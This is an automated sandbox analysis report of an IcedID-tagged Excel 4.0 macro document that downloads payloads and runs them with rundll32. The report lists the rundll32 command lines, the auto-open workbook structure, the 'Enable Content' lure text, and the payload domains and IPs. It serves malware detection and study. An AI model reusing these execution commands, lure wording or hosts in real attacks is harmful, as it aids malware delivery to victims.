Loading ...

Play interactive tourEdit tour

Analysis Report statistic-2070252624.xlsm

Overview

General Information

Sample Name:statistic-2070252624.xlsm
Analysis ID:403877
MD5:0fbdc8a2acd4dc782821cfa4fdf75099
SHA1:e407df0a3a3ceed4c3e9aed5716974a45cd5c542
SHA256:abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2704 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2592 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 648, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2704
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 648, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 2704

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-2070252624.xlsmReversingLabs: Detection: 57%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1EA088F.pngJump to behavior
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Cont
    Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above RunDLL |~| OTherewas a problem starting ..\jordji.nbvt1
    Source: Screenshot number: 8Screenshot OCR: Enable Editing , please click Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOC
    Source: Screenshot number: 8Screenshot OCR: Enable Content i from the yellow bar above WHY I CANNOTOPEN THIS DOCUMENT? 1 W You are usingiOS o
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-2070252624.xlsmInitial sample: EXEC
    Source: statistic-2070252624.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-2070252624.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/18@2/2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$statistic-2070252624.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD49D.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-2070252624.xlsmReversingLabs: Detection: 57%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-2070252624.xlsm6%VirustotalBrowse
    statistic-2070252624.xlsm57%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse
    industrialarttextile.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2115822805.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109243242.0000000001CF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpfalse
              high
              http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2115517604.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2108995944.0000000001B10000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  192.185.5.2
                  anaheimdermatologists.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  192.254.233.89
                  industrialarttextile.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:403877
                  Start date:04.05.2021
                  Start time:13:39:58
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:statistic-2070252624.xlsm
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal84.troj.expl.evad.winXLSM@5/18@2/2
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsm
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  192.185.5.2statistic-2072807337.xlsmGet hashmaliciousBrowse
                    statistic-207394368.xlsmGet hashmaliciousBrowse
                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                        statistic-207394368.xlsmGet hashmaliciousBrowse
                          catalog-1521295750.xlsmGet hashmaliciousBrowse
                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                statistic-1048881972.xlsmGet hashmaliciousBrowse
                                  f.xlsmGet hashmaliciousBrowse
                                    f.xlsmGet hashmaliciousBrowse
                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                        statistic-118970052.xlsmGet hashmaliciousBrowse
                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                              diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                  diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                    diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                      diagram-136896931.xlsmGet hashmaliciousBrowse
                                                        diagram-136896931.xlsmGet hashmaliciousBrowse
                                                          192.254.233.89statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                  statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                        statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              industrialarttextile.comstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              anaheimdermatologists.comstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                              • 192.185.5.2
                                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                              • 192.185.5.2

                                                                              ASN

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              UNIFIEDLAYER-AS-1USstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                              • 162.241.169.22
                                                                              ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                              • 192.254.185.244
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                              • 192.254.233.89
                                                                              presentation.jarGet hashmaliciousBrowse
                                                                              • 50.87.249.219
                                                                              presentation.jarGet hashmaliciousBrowse
                                                                              • 50.87.249.219
                                                                              GK58.vbsGet hashmaliciousBrowse
                                                                              • 192.185.21.136
                                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.20.98
                                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                              • 192.185.20.98
                                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                              • 50.87.166.59
